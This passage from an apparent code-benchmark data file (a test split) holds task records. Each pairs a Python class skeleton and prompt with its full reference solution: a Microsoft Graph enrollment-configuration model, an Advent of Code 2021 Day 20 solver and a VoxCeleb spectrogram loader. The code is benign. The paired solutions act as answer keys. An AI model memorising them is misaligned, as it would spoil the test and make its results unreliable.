mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n<|end_body_0|>\n\n<|body_start_1|>\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from 
.device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000357", "length_bytes": 6436, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `DeviceEnrollmentConfiguration` described below.\n\nClass description:\nThe Base Class of Device Enrollment Configuration\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use 
to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `DeviceEnrollmentConfiguration` described below.\n\nClass description:\nThe Base Class of Device Enrollment Configuration\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n<|end_body_0|>\n\n<|body_start_1|>\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from 
.device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node 
to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n 
writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/device_enrollment_configuration.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "64e25d923b0cb98d7949b97099008f1e7cc7dbd2", "bodies": ["b1, b2 = parse(filename)\nb2 = np.array(b2, dtype=np.int16)\nb2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\nb2 = enhance(b1, b2)\nb2 = enhance(b1, b2)\nreturn np.count_nonzero(b2)", "data = parse(filename)\nb1, b2 = parse(filename)\nb2 = np.array(b2, dtype=np.int16)\nb2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\nfor _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\nreturn np.count_nonzero(b2)"], "bodies_text": "<|body_start_0|>\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n<|end_body_0|>\n\n<|body_start_1|>\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n<|end_body_1|>\n", "class_docstring": "AoC 2021 Day 20", "class_name": "Day20", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n <|body_0|>\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n<|end_body_0|>\n\n<|body_start_1|>\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000358", "length_bytes": 1992, "license_type": "no_license", "methods": [{"docstring": "Given a filename, solve 2021 day 20 part 1", "name": "part1", "signature": "def part1(filename: str) -> int"}, {"docstring": "Given a filename, solve 2021 day 20 part 2", "name": "part2", "signature": "def part2(filename: str) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Day20` described below.\n\nClass description:\nAoC 2021 Day 20\n\nMethod signatures and docstrings:\n- def part1(filename: str) -> int: Given a filename, solve 2021 day 20 part 1\n- def part2(filename: str) -> int: Given a filename, solve 2021 day 20 part 2", "prompted_full_text": "Implement the Python class `Day20` described below.\n\nClass description:\nAoC 2021 Day 20\n\nMethod signatures and docstrings:\n- def part1(filename: str) -> int: Given a filename, solve 2021 
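Editor's note on the msgraph `DeviceEnrollmentConfiguration` record that closes above: `create_from_discriminator_value` dispatches on the `@odata.type` string via a chain of `casefold()` comparisons. The toy below shows the same dispatch with a lookup table; the class names are stand-ins, not the real msgraph models.

```python
# Toy sketch of @odata.type discriminator dispatch; classes are stand-ins.
class Base:
    pass

class LimitConfig(Base):
    pass

class RestrictionsConfig(Base):
    pass

_DISPATCH = {
    "#microsoft.graph.deviceenrollmentlimitconfiguration": LimitConfig,
    "#microsoft.graph.deviceenrollmentplatformrestrictionsconfiguration": RestrictionsConfig,
}

def create_from_discriminator_value(payload: dict) -> Base:
    tag = (payload.get("@odata.type") or "").casefold()
    return _DISPATCH.get(tag, Base)()  # default to the base type

obj = create_from_discriminator_value(
    {"@odata.type": "#microsoft.graph.deviceEnrollmentLimitConfiguration"})
assert isinstance(obj, LimitConfig)
assert type(create_from_discriminator_value({})) is Base
```

Incidentally, the recorded `get_field_deserializers` performs every local import twice in a row; the duplicates are redundant (Python caches imported modules) but harmless, and are likely an artifact of code generation in this SDK.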
day 20 part 1\n- def part2(filename: str) -> int: Given a filename, solve 2021 day 20 part 2\n\n<|skeleton|>\nclass Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n <|body_0|>\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n<|end_body_0|>\n\n<|body_start_1|>\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n<|end_body_1|>\n", "revision_id": "e89db235837d2d05848210a18c9c2a4456085570", "skeleton": "<|skeleton|>\nclass Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n <|body_0|>\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n", "source": "the_stack_v2_python_sparse", "source_path": "2021/python2021/aoc/day20.py", "source_repo": "mreishus/aoc", "split": "test", "star_events_count": 16} {"blob_id": "b7ae12437727c5f89d006f643674c018db505e04", "bodies": ["audio = np.empty((1,))\nsecs_loaded = 0\nfiles_loaded = 0\nfiles = glob.glob(path + '*.wav')\nfor file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\ntotal_samples = int(round(secs * sr))\nif total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' 
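Editor's note on the `Day20` record that closes above: the part-2 loop re-pads the grid every round with the current corner value so that, when the enhancement algorithm flips the infinite background on alternate steps, the border tracks that flip. The runnable sketch below isolates that bookkeeping with a stub `enhance`; the real one maps each 3x3 neighbourhood through the 512-entry algorithm string, which the record's `parse` returns as `b1`.

```python
# Pad-then-enhance bookkeeping from Day20.part2, with a stub enhance().
import numpy as np

def enhance(algo, grid):
    # Stub standing in for the real 3x3-neighbourhood lookup.
    return grid

grid = np.pad(np.array([[1]], dtype=np.int16), (3, 3), constant_values=0)
for _ in range(50):
    grid = enhance(None, grid)
    pad = grid[0][0]  # corner value == current infinite background
    grid = np.pad(grid, (2, 2), constant_values=(pad, pad))
print(int(np.count_nonzero(grid)))
```

Two small points on the recorded solution: the first line of `part2`, `data = parse(filename)`, is dead code, since the result is recomputed and unpacked on the next line; and `part1` appears to rely on an even step count — a flipping background is lit after the first pass and dark again after the second, so a fixed zero padding of four cells suffices for two rounds.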
% (secs, len(audio) / sr))\naudio = audio[0:total_samples]\nself.audio = audio\nself.sampling_rate = sr", "nperseg = round(int(seg_length * self.sampling_rate))\nnoverlap = round(int(nperseg * overlap))\nspectrogram_kwargs['fs'] = self.sampling_rate\nspectrogram_kwargs['nperseg'] = nperseg\nspectrogram_kwargs['noverlap'] = noverlap\n_, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\nif normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\nreturn (S, self.audio)"], "bodies_text": "<|body_start_0|>\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n<|end_body_0|>\n\n<|body_start_1|>\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n<|end_body_1|>\n", "class_docstring": "Spectrogram data from the Vox Celeb Dataset.", "class_name": "VoxCeleb", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n <|body_0|>\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). 
Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n<|end_body_0|>\n\n<|body_start_1|>\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000359", "length_bytes": 3492, "license_type": "no_license", "methods": [{"docstring": "Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.", "name": "__init__", "signature": "def __init__(self, secs, path, concat=True)"}, {"docstring": "Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples", "name": "generate", "signature": "def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001657", "prompt": "Implement the Python class `VoxCeleb` described below.\n\nClass description:\nSpectrogram data from the Vox Celeb Dataset.\n\nMethod signatures and docstrings:\n- def __init__(self, secs, path, concat=True): Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\n- def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs): Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. 
overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples", "prompted_full_text": "Implement the Python class `VoxCeleb` described below.\n\nClass description:\nSpectrogram data from the Vox Celeb Dataset.\n\nMethod signatures and docstrings:\n- def __init__(self, secs, path, concat=True): Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\n- def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs): Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\n\n<|skeleton|>\nclass VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n <|body_0|>\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). 
